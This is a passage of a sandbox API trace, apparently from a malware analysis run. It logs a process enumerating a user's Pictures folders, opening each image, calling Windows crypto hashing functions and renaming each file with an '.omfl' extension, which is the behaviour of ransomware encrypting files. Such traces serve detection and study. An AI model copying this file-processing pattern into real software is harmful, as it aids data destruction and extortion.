HALPmcxz\\Pictures\\94ItO\\QImRpoeP_o_7M.bmp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\qimrpoep_o_7m.bmp.omfl")) returned 1 [0134.044] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.044] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.044] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.045] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0134.045] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d04dde0, ftCreationTime.dwHighDateTime=0x1d5de40, ftLastAccessTime.dwLowDateTime=0xbde7cbd0, ftLastAccessTime.dwHighDateTime=0x1d5d7cd, ftLastWriteTime.dwLowDateTime=0xbde7cbd0, ftLastWriteTime.dwHighDateTime=0x1d5d7cd, nFileSizeHigh=0x0, nFileSizeLow=0x430a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vz8eR.bmp", cAlternateFileName="")) returned 1 [0134.045] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\Vz8eR.bmp") returned=".bmp" [0134.045] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\Vz8eR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\vz8er.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.045] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=17162) returned 1 [0134.046] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.049] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.050] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.050] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.050] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.050] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.050] GetLastError () returned 0x0 [0134.050] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.050] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.050] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.050] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.050] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.051] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\Vz8eR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\vz8er.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\Vz8eR.bmp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\vz8er.bmp.omfl")) returned 1 [0134.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.052] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0134.053] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa70c9030, ftCreationTime.dwHighDateTime=0x1d5d8e0, ftLastAccessTime.dwLowDateTime=0x1c632f20, ftLastAccessTime.dwHighDateTime=0x1d5de80, ftLastWriteTime.dwLowDateTime=0x1c632f20, ftLastWriteTime.dwHighDateTime=0x1d5de80, nFileSizeHigh=0x0, nFileSizeLow=0x12cd3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xCRN5D.bmp", cAlternateFileName="")) returned 1 [0134.053] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\xCRN5D.bmp") returned=".bmp" [0134.053] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\xCRN5D.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\xcrn5d.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.054] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=77011) returned 1 [0134.054] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.058] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.059] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.059] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.059] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.059] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.059] GetLastError () returned 0x0 [0134.059] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.059] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.059] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.059] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.059] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.059] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.059] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.061] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\xCRN5D.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\xcrn5d.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\xCRN5D.bmp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\xcrn5d.bmp.omfl")) returned 1 [0134.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.061] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0134.063] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa70c9030, ftCreationTime.dwHighDateTime=0x1d5d8e0, ftLastAccessTime.dwLowDateTime=0x1c632f20, ftLastAccessTime.dwHighDateTime=0x1d5de80, ftLastWriteTime.dwLowDateTime=0x1c632f20, ftLastWriteTime.dwHighDateTime=0x1d5de80, nFileSizeHigh=0x0, nFileSizeLow=0x12cd3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xCRN5D.bmp", cAlternateFileName="")) returned 0 [0134.063] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0134.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0134.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5dc0 | out: hHeap=0x4970000) returned 1 [0134.063] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.063] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.063] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\") returned="SqYhvBjGVsjCxavcn\\" [0134.063] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0134.064] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.064] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0134.064] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.064] PathFindFileNameW (pszPath="") returned="" [0134.064] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\-afBhE.bmp") returned=".bmp" [0134.064] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\-afBhE.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\-afbhe.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.064] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=68240) returned 1 [0134.064] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.068] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0134.069] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.069] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.069] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.069] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.069] GetLastError () returned 0x0 [0134.069] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.069] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0134.069] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.069] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.069] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.070] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.071] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\-afBhE.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\-afbhe.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\-afBhE.bmp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\-afbhe.bmp.omfl")) returned 1 [0134.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.072] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e6bb8 | out: hHeap=0x4970000) returned 1 [0134.073] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9190a430, ftCreationTime.dwHighDateTime=0x1d5e62d, ftLastAccessTime.dwLowDateTime=0x91d2ed10, ftLastAccessTime.dwHighDateTime=0x1d5dec9, ftLastWriteTime.dwLowDateTime=0x91d2ed10, ftLastWriteTime.dwHighDateTime=0x1d5dec9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2-VviHUj4Jrbbiwm1-j", cAlternateFileName="2-VVIH~1")) returned 1 [0134.074] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\fA7b.bmp") returned=".bmp" [0134.074] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\fA7b.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\fa7b.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.074] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=82078) returned 1 [0134.074] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.078] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2cd0) returned 1 [0134.079] CryptCreateHash (in: hProv=0x49d2cd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.079] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.079] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.079] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.079] GetLastError () returned 0x0 [0134.079] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.079] CryptReleaseContext (hProv=0x49d2cd0, dwFlags=0x0) returned 1 [0134.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.079] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.079] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.079] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.081] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\fA7b.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\fa7b.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\fA7b.bmp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\fa7b.bmp.omfl")) returned 1 [0134.081] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.081] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.081] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e6bb8 | out: hHeap=0x4970000) returned 1 [0134.083] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70c8e500, ftCreationTime.dwHighDateTime=0x1d5e0c9, ftLastAccessTime.dwLowDateTime=0xcd1cc410, ftLastAccessTime.dwHighDateTime=0x1d5e2ff, ftLastWriteTime.dwLowDateTime=0xcd1cc410, ftLastWriteTime.dwHighDateTime=0x1d5e2ff, nFileSizeHigh=0x0, nFileSizeLow=0x16525, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IYqsUcagwRwc.bmp", cAlternateFileName="IYQSUC~1.BMP")) returned 1 [0134.083] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\IYqsUcagwRwc.bmp") returned=".bmp" [0134.083] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\IYqsUcagwRwc.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\iyqsucagwrwc.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.083] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=91429) returned 1 [0134.083] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.087] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2cd0) returned 1 [0134.088] CryptCreateHash (in: hProv=0x49d2cd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.088] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.088] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.088] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.088] GetLastError () returned 0x0 [0134.088] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.088] CryptReleaseContext (hProv=0x49d2cd0, dwFlags=0x0) returned 1 [0134.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.089] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.089] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.089] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.089] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.090] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\IYqsUcagwRwc.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\iyqsucagwrwc.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\IYqsUcagwRwc.bmp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\iyqsucagwrwc.bmp.omfl")) returned 1 [0134.091] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.091] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.091] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.092] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e6bb8 | out: hHeap=0x4970000) returned 1 [0134.092] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9afc0b10, ftCreationTime.dwHighDateTime=0x1d5e0d6, ftLastAccessTime.dwLowDateTime=0x2169c50, ftLastAccessTime.dwHighDateTime=0x1d5e43a, ftLastWriteTime.dwLowDateTime=0x2169c50, ftLastWriteTime.dwHighDateTime=0x1d5e43a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nfvg7ITf", cAlternateFileName="")) returned 1 [0134.092] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\pGDKQFxGMk_QU.jpg") returned=".jpg" [0134.093] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\pGDKQFxGMk_QU.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\pgdkqfxgmk_qu.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.093] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=31665) returned 1 [0134.093] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.096] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2cd0) returned 1 [0134.097] CryptCreateHash (in: hProv=0x49d2cd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.097] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.097] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.097] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.097] GetLastError () returned 0x0 [0134.097] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.097] CryptReleaseContext (hProv=0x49d2cd0, dwFlags=0x0) returned 1 [0134.097] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.097] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.097] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.097] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.097] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.098] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\pGDKQFxGMk_QU.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\pgdkqfxgmk_qu.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\pGDKQFxGMk_QU.jpg.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\pgdkqfxgmk_qu.jpg.omfl")) returned 1 [0134.099] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.099] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.099] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.100] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e6bb8 | out: hHeap=0x4970000) returned 1 [0134.100] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3bb5890, ftCreationTime.dwHighDateTime=0x1d5df65, ftLastAccessTime.dwLowDateTime=0x5d91e210, ftLastAccessTime.dwHighDateTime=0x1d5e043, ftLastWriteTime.dwLowDateTime=0x5d91e210, ftLastWriteTime.dwHighDateTime=0x1d5e043, nFileSizeHigh=0x0, nFileSizeLow=0xd21a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vNRH6XZeQB5ODCEXcQr0.gif", cAlternateFileName="VNRH6X~1.GIF")) returned 1 [0134.101] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\vNRH6XZeQB5ODCEXcQr0.gif") returned=".gif" [0134.101] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\vNRH6XZeQB5ODCEXcQr0.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\vnrh6xzeqb5odcexcqr0.gif"), 